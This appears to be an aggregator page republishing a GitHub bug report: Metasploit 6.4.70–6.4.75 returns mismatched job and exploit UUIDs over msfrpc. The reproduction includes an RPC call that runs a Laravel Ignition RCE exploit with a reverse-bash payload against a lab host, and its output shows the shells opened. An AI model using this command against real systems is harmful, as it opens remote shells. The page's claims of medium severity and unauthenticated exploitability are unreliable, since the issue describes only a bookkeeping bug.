Metasploit Framework exploit_uuid Correlation Vulnerability

漏洞信息

漏洞名称: Metasploit Framework exploit_uuid Correlation Vulnerability

漏洞类型: 其他

漏洞等级: 中危

漏洞描述: ### 受影响产品
Metasploit Framework 是一款广泛使用的渗透测试工具,它提供了开发、测试和执行漏洞利用代码的平台。它被安全研究人员和渗透测试人员广泛用于评估网络和应用的安全性。此漏洞影响版本6.4.70至6.4.75的Metasploit Framework。

漏洞说明

此漏洞属于逻辑错误类别,具体表现为在Metasploit Framework的6.4.70至6.4.75版本中,通过msfrpc执行模块时,生成的job uuid与session列表中的exploit_uuid不匹配。这种不一致可能导致在自动化脚本或工具中跟踪和管理会话时出现问题,影响渗透测试的效率和准确性。

影响分析

虽然此漏洞不直接导致远程代码执行或数据泄露,但它影响了Metasploit Framework的会话管理功能。对于依赖自动化脚本进行大规模渗透测试的安全研究人员和渗透测试人员来说,这种不一致可能导致会话跟踪失败,增加管理复杂性。此外,这种问题可能在自动化攻击链中引入不确定性,影响攻击的成功率。由于此漏洞不需要认证即可利用,因此在特定环境下可能被利用来干扰正常的渗透测试流程。

产品厂商: Rapid7

产品名称: Metasploit Framework

影响版本: 6.4.70 <= version <= 6.4.75

来源: https://github.com/rapid7/metasploit-framework/issues/20411

类型: rapid7/metasploit-framework:github issues

来源概述

Steps to reproduce

Using msfrpc

1
2
3
rpc.call("module.execute", "exploit", "multi/php/ignition_laravel_debug_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "8080", "LHOST"=>"10.0.0.152", "PAYLOAD"=>"cmd/unix/reverse_bash", "LPORT"=>"4443"}) 

rpc.call("session.list")

But you can use any exploit.

Expected behavior

For versions up and to 6.4.68 using the rpc for execution a yields valid exploit_uuid in the session list:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
>> rpc.call("module.execute", "exploit", "multi/php/ignition_laravel_debug_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "8080", "LHOST"=>"10.0.0.152", "PAYLOAD"=>"cmd/unix/reverse_bash", "LPORT"=>"4443"}) 
=> {"job_id" => 0, "uuid" => "wztfnhvr"}
>> rpc.call("session.list")
=> 
{1 =>
  {"type" => "shell",
   "tunnel_local" => "10.0.0.152:4443",
   "tunnel_peer" => "172.19.0.2:55024",
   "via_exploit" => "exploit/multi/php/ignition_laravel_debug_rce",
   "via_payload" => "payload/cmd/unix/reverse_bash",
   "desc" => "Command shell",
   "info" => "",
   "workspace" => "",
   "session_host" => "127.0.0.1",
   "session_port" => 8080,
   "target_host" => "127.0.0.1",
   "username" => "mitsos",
   "uuid" => "qtg6iwhj",
   "exploit_uuid" => "wztfnhvr",
   "routes" => "",
   "arch" => "cmd"}}

As you can see the job uuid is the same as the exploit_uuid in the session list. wztfnhvr

Current behavior

For versions 6.4.70-6.4.75 (latest as of time of reporting this) the job uuid and exploit_uuid are not the same:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
>> rpc.call("module.execute", "exploit", "multi/php/ignition_laravel_debug_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "8080", "LHOST"=>"10.0.0.152", "PAYLOAD"=>"cmd/unix/reverse_bash", "LPORT"=>"4443"}) 
=> {"job_id" => 0, "uuid" => "t0qc3k89"}
>> rpc.call("session.list")
=> 
{1 =>
  {"type" => "shell",
   "tunnel_local" => "10.0.0.152:4443",
   "tunnel_peer" => "172.19.0.2:33796",
   "via_exploit" => "exploit/multi/php/ignition_laravel_debug_rce",
   "via_payload" => "payload/cmd/unix/reverse_bash",
   "desc" => "Command shell",
   "info" => "",
   "workspace" => "",
   "session_host" => "127.0.0.1",
   "session_port" => 8080,
   "target_host" => "127.0.0.1",
   "username" => "mitsos",
   "uuid" => "bo3zoqd4",
   "exploit_uuid" => "csfmnwrp",
   "routes" => "",
   "arch" => "cmd"}}

The job UUID is t0qc3k89 while the exploit_uuid is csfmnwrp

Metasploit version

>-6.4.70

Github Poc
#rapid7/metasploit-framework:github issues #其他
Metasploit Framework exploit_uuid Correlation Vulnerability
http://example.com/2025/07/30/github_2099811044/
作者
lianccc
发布于
2025年7月30日
许可协议